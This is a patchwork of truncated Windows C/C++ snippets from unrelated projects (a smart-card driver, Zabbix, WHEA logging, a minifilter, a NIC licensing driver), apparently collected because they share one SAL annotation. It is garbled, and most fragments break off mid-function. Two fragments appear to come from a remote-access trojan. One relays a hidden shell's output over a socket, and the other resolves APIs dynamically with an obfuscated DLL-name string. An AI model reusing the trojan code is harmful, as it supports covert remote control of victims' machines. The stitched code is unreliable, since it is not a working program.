#include "beidmdrv.h" #include "tlv.h" /****************************************************************************************************/ // // Function: CardGetContainerProperty // #define WHERE "CardGetContainerProperty()" DWORD WINAPI CardGetContainerProperty ( __in PCARD_DATA pCardData, __in BYTE bContainerIndex, __in LPCWSTR wszProperty, __out_bcount_part_opt(cbData, *pdwDataLen) PBYTE pbData, __in DWORD cbData, __out PDWORD pdwDataLen, __in DWORD dwFlags ) { DWORD dwReturn = 0; CONTAINER_INFO ContInfo; DWORD cbCertif = 0; DWORD dwCertSpec = 0; PBYTE pbCertif = NULL; PIN_ID dwPinId = 0; LogTrace(LOGTYPE_INFO, WHERE, "Enter API..."); memset(&ContInfo, '\0', sizeof(ContInfo));
DWORD WINAPI CShellManager::ReadPipeThread(LPVOID lparam) { typedef BOOL (WINAPI *ReadFileT) ( __in HANDLE hFile, __out_bcount_part(nNumberOfBytesToRead, *lpNumberOfBytesRead) LPVOID lpBuffer, __in DWORD nNumberOfBytesToRead, __out_opt LPDWORD lpNumberOfBytesRead, __inout_opt LPOVERLAPPED lpOverlapped ); ReadFileT pReadFile = (ReadFileT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"ReadFile"); typedef HLOCAL (WINAPI *LocalAllocT) ( __in UINT uFlags, __in SIZE_T uBytes ); LocalAllocT pLocalAlloc = (LocalAllocT)GetProcAddress(LoadLibrary("kernel32.dll"),"LocalAlloc"); typedef HLOCAL (WINAPI *LocalFreeT) ( __deref HLOCAL hMem ); LocalFreeT pLocalFree = (LocalFreeT)GetProcAddress(LoadLibrary("kernel32.dll"),"LocalFree"); typedef VOID (WINAPI *SleepT) ( __in DWORD dwMilliseconds ); SleepT pSleep = (SleepT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"Sleep"); typedef BOOL (WINAPI *PeekNamedPipeT) ( __in HANDLE hNamedPipe, __out_bcount_part_opt(nBufferSize, *lpBytesRead) LPVOID lpBuffer, __in DWORD nBufferSize, __out_opt LPDWORD lpBytesRead, __out_opt LPDWORD lpTotalBytesAvail, __out_opt LPDWORD lpBytesLeftThisMessage ); PeekNamedPipeT pPeekNamedPipe = (PeekNamedPipeT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"PeekNamedPipe"); unsigned long BytesRead = 0; char ReadBuff[1024]; DWORD TotalBytesAvail; CShellManager *pThis = (CShellManager *)lparam; while (1) { pSleep(100); while (pPeekNamedPipe(pThis->m_hReadPipeHandle, ReadBuff, sizeof(ReadBuff), &BytesRead, &TotalBytesAvail, NULL)) { if (BytesRead <= 0) break; memset(ReadBuff, 0, sizeof(ReadBuff)); LPBYTE lpBuffer = (LPBYTE)pLocalAlloc(LPTR, TotalBytesAvail); pReadFile(pThis->m_hReadPipeHandle, lpBuffer, TotalBytesAvail, &BytesRead, NULL); // ·¢ËÍÊý¾Ý pThis->Send(lpBuffer, BytesRead); pLocalFree(lpBuffer); } } return 0; }
char *GetLogUser2K() { typedef BOOL (WINAPI *OpenProcessTokenT)( __in HANDLE ProcessHandle, __in DWORD DesiredAccess, __deref_out PHANDLE TokenHandle ); char KIoFqQPSy[] = {'A','D','V','A','P','I','3','2','.','d','l','l','\0'}; OpenProcessTokenT pOpenProcessToken=(OpenProcessTokenT)GetProcAddress(LoadLibrary(KIoFqQPSy),"OpenProcessToken"); typedef BOOL (WINAPI *LookupAccountSidAT)( __in_opt LPCSTR lpSystemName, __in PSID Sid, __out_ecount_part_opt(*cchName, *cchName + 1) LPSTR Name, __inout LPDWORD cchName, __out_ecount_part_opt(*cchReferencedDomainName, *cchReferencedDomainName + 1) LPSTR ReferencedDomainName, __inout LPDWORD cchReferencedDomainName, __out PSID_NAME_USE peUse ); LookupAccountSidAT pLookupAccountSidA=(LookupAccountSidAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"LookupAccountSidA"); typedef BOOL (WINAPI *GetTokenInformationT)( __in HANDLE TokenHandle, __in TOKEN_INFORMATION_CLASS TokenInformationClass, __out_bcount_part_opt(TokenInformationLength, *ReturnLength) LPVOID TokenInformation, __in DWORD TokenInformationLength, __out_opt PDWORD ReturnLength ); GetTokenInformationT pGetTokenInformation=(GetTokenInformationT)GetProcAddress(LoadLibrary(KIoFqQPSy),"GetTokenInformation"); typedef HANDLE (WINAPI *OpenProcessT)( __in DWORD dwDesiredAccess, __in BOOL bInheritHandle, __in DWORD dwProcessId ); OpenProcessT pOpenProcess=(OpenProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"OpenProcess"); DWORD dwProcessID = GetProcessID("explorer.exe"); if (dwProcessID == 0) return NULL; BOOL fResult = FALSE; HANDLE hProc = NULL; HANDLE hToken = NULL; TOKEN_USER *pTokenUser = NULL; char *lpUserName = NULL; __try { // Open the process with PROCESS_QUERY_INFORMATION access hProc = pOpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwProcessID); if (hProc == NULL) { __leave; } fResult = pOpenProcessToken(hProc, TOKEN_QUERY, &hToken); if(!fResult) { __leave; } DWORD dwNeedLen = 0; fResult = pGetTokenInformation(hToken,TokenUser, NULL, 0, &dwNeedLen); if (dwNeedLen > 0) { pTokenUser = (TOKEN_USER*)new BYTE[dwNeedLen]; fResult = pGetTokenInformation(hToken,TokenUser, pTokenUser, dwNeedLen, &dwNeedLen); if (!fResult) { __leave; } } else { __leave; } SID_NAME_USE sn; TCHAR szDomainName[MAX_PATH]; DWORD dwDmLen = MAX_PATH; DWORD nNameLen = 256; lpUserName = new char[256]; fResult = pLookupAccountSidA(NULL, pTokenUser->User.Sid, lpUserName, &nNameLen, szDomainName, &dwDmLen, &sn); } __finally { if (hProc) ::CloseHandle(hProc); if (hToken) ::CloseHandle(hToken); if (pTokenUser) delete[] (char*)pTokenUser; return lpUserName; } }
typedef struct { HANDLE handle, each_handle, context_handle, keyword_context_handle; }zbx_eventlog_context; #define EvtQuery EvtQueryProc #define EvtCreateRenderContext EvtCreateRenderContextProc #define EvtNext EvtNextProc #define EvtRender EvtRenderProc #define EvtOpenPublisherMetadata EvtOpenPublisherMetadataProc #define EvtFormatMessage EvtFormatMessageProc #define EvtClose EvtCloseProc static EVT_HANDLE (WINAPI *EvtQuery)(EVT_HANDLE, LPCWSTR, LPCWSTR, DWORD) = NULL; static EVT_HANDLE (WINAPI *EvtCreateRenderContext)(DWORD, LPCWSTR*, DWORD) = NULL; static BOOL (WINAPI *EvtNext)(EVT_HANDLE, DWORD, PEVT_HANDLE, DWORD, DWORD, __out PDWORD) = NULL; static BOOL (WINAPI *EvtRender)(EVT_HANDLE, EVT_HANDLE, DWORD, DWORD, __out_bcount_part_opt(BufferSize, *BufferUsed) PVOID, __out PDWORD, __out PDWORD) = NULL; static EVT_HANDLE (WINAPI *EvtOpenPublisherMetadata)(EVT_HANDLE, LPCWSTR, LPCWSTR, LCID, DWORD) = NULL; static BOOL (WINAPI *EvtFormatMessage)(EVT_HANDLE, EVT_HANDLE, DWORD, DWORD, PEVT_VARIANT, DWORD, DWORD, __out_ecount_part_opt(BufferSize, *BufferUsed) LPWSTR, __out PDWORD) = NULL; static BOOL (WINAPI *EvtClose)(EVT_HANDLE) = NULL; int get_eventlog_keywords(void *v, zbx_uint64_t *out_keywords) { const char *__function_name = "zbx_get_event_keyword"; int ret = FAIL; zbx_eventlog_context *context = v; LPWSTR query = L"/Event/System/Keywords"; PEVT_VARIANT eventlog_array = NULL; DWORD dwReturned = 0, dwValuesCount = 0, dwBufferSize = 0; unsigned long status = ERROR_SUCCESS; zabbix_log(LOG_LEVEL_DEBUG, "In %s()", __function_name);
if (QueryHandle == NULL) { if (SessionHandle != NULL) { EvtClose(SessionHandle); } SetLastError(Error); } return QueryHandle; } __success(return != FALSE) BOOL CperGetNextWheaLogEntry ( __in EVT_HANDLE QueryHandle, __out_bcount_part_opt(BufferSize, *ReturnedSize) PWHEA_ERROR_RECORD Record, __in DWORD BufferSize, __out DWORD *ReturnedSize ) /*++ Routine Description: This routine will return the next available WHEA error record logged to the WHEA error event log channel. Arguments: QueryHandle - Supplies a handle to the event log query returned by a call to CperOpenWheaLogQuery.
__in PCFLT_RELATED_OBJECTS FltObjects, __deref_out_opt PVOID *CompletionContext ); NTSTATUS FilterUnload ( IN FLT_FILTER_UNLOAD_FLAGS Flags ); NTSTATUS SetupCallback (IN PCFLT_RELATED_OBJECTS FltObjects, IN FLT_INSTANCE_SETUP_FLAGS Flags, IN DEVICE_TYPE VolumeDeviceType, IN FLT_FILESYSTEM_TYPE VolumeFilesystemType); NTSTATUS MessageCallback ( __in PVOID ConnectionCookie, __in_bcount_opt(InputBufferSize) PVOID InputBuffer, __in ULONG InputBufferSize, __out_bcount_part_opt(OutputBufferSize,*ReturnOutputBufferLength) PVOID OutputBuffer, __in ULONG OutputBufferSize, __out PULONG ReturnOutputBufferLength ); NTSTATUS ConnectCallback( __in PFLT_PORT ClientPort, __in PVOID ServerPortCookie, __in_bcount(SizeOfContext) PVOID ConnectionContext, __in ULONG SizeOfContext, __deref_out_opt PVOID *ConnectionCookie ); VOID DisconnectCallback( __in_opt PVOID ConnectionCookie );
{ if (pSA != NULL) { if (pSA->lpSecurityDescriptor != NULL) ::LocalFree(pSA->lpSecurityDescriptor); ::LocalFree(pSA); } } WINADVAPI BOOL WINAPI CreateWellKnownSid( __in WELL_KNOWN_SID_TYPE WellKnownSidType, __in_opt PSID DomainSid, __out_bcount_part_opt(*cbSid, *cbSid) PSID pSid, __inout DWORD *cbSid ); XSH_DESCRIPTOR* COxtSecurityHelper::CreateXgaComSecurityDescriptor() { DWORD dwRet; DWORD dwSidSize; BOOL bRet; XSH_DESCRIPTOR *pXD = NULL; EXPLICIT_ACCESS ea = {0}; pXD = (XSH_DESCRIPTOR*)::LocalAlloc(LMEM_FIXED, sizeof(XSH_DESCRIPTOR)); if (pXD == NULL) { m_pclOxtSvc->LogEventTypeId(ctxLS(IDS_FAILED_TO_ALLOCATE_XSH_DESCRIPTO_OXTSECURITYHELPER_1689),
__in efx_nic_t *enp, __out efx_key_stats_t *eksp); static __checkReturn efx_rc_t efx_mcdi_licensing_v3_app_state( __in efx_nic_t *enp, __in uint64_t app_id, __out boolean_t *licensedp); static __checkReturn efx_rc_t efx_mcdi_licensing_v3_get_id( __in efx_nic_t *enp, __in size_t buffer_size, __out uint32_t *typep, __out size_t *lengthp, __out_bcount_part_opt(buffer_size, *lengthp) uint8_t *bufferp); __checkReturn efx_rc_t efx_lic_v3_find_start( __in efx_nic_t *enp, __in_bcount(buffer_size) caddr_t bufferp, __in size_t buffer_size, __out uint32_t *startp ); __checkReturn efx_rc_t efx_lic_v3_find_end( __in efx_nic_t *enp, __in_bcount(buffer_size)